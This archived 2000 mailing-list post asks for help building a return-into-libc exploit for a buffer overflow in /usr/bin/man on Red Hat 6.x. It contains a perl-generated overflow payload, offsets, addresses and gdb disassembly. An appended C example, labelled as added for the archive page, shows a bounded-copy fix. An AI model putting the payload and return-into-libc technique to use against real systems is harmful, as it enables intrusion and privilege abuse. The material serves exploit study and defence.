Vulnerability Development mailing list archives

No-Exec Stack Smashing 101


From: lamont () ICOPYRIGHT COM (Granquist, Lamont)
Date: Wed, 19 Apr 2000 16:31:40 -0700


Thought I'd try to liven the discussion up here a bit...

Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on
RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it).
And I'm looking for a little help here.  What I've been playing with so
far is things like the following trying to sort out the parameters of the
buffer overflow:

setenv MANPAGER `perl -e 'print "A" x 4057; print "\xe0\xca\x05\x40";'`
/usr/bin/man man
gdb /usr/bin/man core

Now the goal is to make man do a system("/bin/echo i 0wn y3w") call via
returning into system() with the string being a parameter to the call with
no code being executed on the stack.

What I've found out is:

1.  the RA is 4057 bytes beyond the start of the buffer
2.  the beginning of the buffer is 0xbfffeae5
3.  I have no idea how to properly call system()

#3 is where I need the help, since I'm relatively x86-architecture
and linux-kernel-hacking inexperienced.  Using this:

#include <stdio.h>
#include <stdlib.h>   /* declares system() */

int main(void) {
  system("/bin/echo foobar");
  return 0;
}

I use gdb to disassemble to this:

Dump of assembler code for function main:
0x80483c8 <main>:       push   %ebp
0x80483c9 <main+1>:     mov    %esp,%ebp
0x80483cb <main+3>:     push   $0x8048430
0x80483d0 <main+8>:     call   0x80482e8 <system>
0x80483d5 <main+13>:    add    $0x4,%esp
0x80483d8 <main+16>:    leave
0x80483d9 <main+17>:    ret
End of assembler dump.

So, this appears to be system():

0x80483cb <main+3>:     push   $0x8048430
0x80483d0 <main+8>:     call   0x80482e8 <system>
0x80483d5 <main+13>:    add    $0x4,%esp

So, it looks like I tack "0xbfffeae5" after the RA at wherever the top
of the stack winds up being and system() will pop that off and off we
go.  However shoving 0x80482e8 into the RA like I naively assumed you
could do doesn't appear to work.  This is confirmed when I fire up gdb on
the core file from man and try:

(gdb) disassemble 0x80482e8
No function contains specified address.

OTOH I noticed this:

(gdb) disassemble system
Dump of assembler code for function __libc_system:
0x4005cae0 <__libc_system>:     push   %ebp
0x4005cae1 <__libc_system+1>:   mov    %esp,%ebp
0x4005cae3 <__libc_system+3>:   sub    $0x2c8,%esp
0x4005cae9 <__libc_system+9>:   push   %edi
0x4005caea <__libc_system+10>:  push   %esi
0x4005caeb <__libc_system+11>:  push   %ebx
0x4005caec <__libc_system+12>:  call   0x4005caf1 <__libc_system+17>
0x4005caf1 <__libc_system+17>:  pop    %ebx
0x4005caf2 <__libc_system+18>:  add    $0xaf6fb,%ebx
[...blah...blah...blah...]

So, anyone got any tips for where to point the RA and what the stack
should look like?
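The bug behind the post is an environment value (MANPAGER / MANPATH) copied into a fixed-size stack buffer with no length check; a non-executable stack does not remove it, which is exactly why the post is looking for a return-into-libc path, whereas a bounded copy does. The following is an added example written for this archive page, not code from the post or from the man-1.5g sources: the buffer size PAGER_MAX, the function names, and the "reject rather than truncate" policy are assumptions; the 4057-byte padding and the four trailing address bytes are the values the post itself uses.

```c
/*
 * Added example (not from the post or from man): the unsafe pattern and a
 * bounded replacement for copying an environment value into a stack buffer.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical buffer size; the real size in man-1.5g is not given on the page. */
#define PAGER_MAX 256

/*
 * The vulnerable pattern (shown for contrast, never executed here):
 *
 *   char pager[PAGER_MAX];
 *   strcpy(pager, getenv("MANPAGER"));   // no bound: saved EBP and RA get overwritten
 */

/* Bounded copy: reject anything that does not fit, NUL terminator included.
 * Rejecting instead of truncating matters because the value is later handed
 * to a shell; a silently truncated command string is a different command. */
int copy_pager_checked(char *dst, size_t dstsz, const char *value)
{
    if (value == NULL || dstsz == 0)
        return -1;
    size_t n = strlen(value);
    if (n >= dstsz)               /* would overflow, or leave no room for '\0' */
        return -1;
    memcpy(dst, value, n + 1);
    return 0;
}

/* Returns 1 if VALUE fits a PAGER_MAX buffer and was copied, 0 if rejected. */
int accepts_pager_value(const char *value)
{
    char pager[PAGER_MAX];
    return copy_pager_checked(pager, sizeof pager, value) == 0;
}

/* Constructs a value shaped like the one in the post (4057 'A's followed by
 * the four address bytes) and reports whether the checked copy rejects it.
 * Returns 1 if rejected, 0 if accepted, -1 on allocation failure. */
int long_value_rejected(void)
{
    enum { PAD = 4057 };
    char *value = malloc(PAD + 4 + 1);
    if (value == NULL)
        return -1;
    memset(value, 'A', PAD);
    memcpy(value + PAD, "\xe0\xca\x05\x40", 4);
    value[PAD + 4] = '\0';
    int rejected = !accepts_pager_value(value);
    free(value);
    return rejected;
}

int main(void)
{
    printf("\"less\" accepted:          %d\n", accepts_pager_value("less"));
    printf("4061-byte value rejected: %d\n", long_value_rejected());
    return 0;
}
```

The check is deliberately strict (`n >= dstsz`) so the terminator always fits; a program that instead truncates with strncpy must also write the terminator itself and should still treat an over-long pager string as an error, since the value ends up in a command line.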
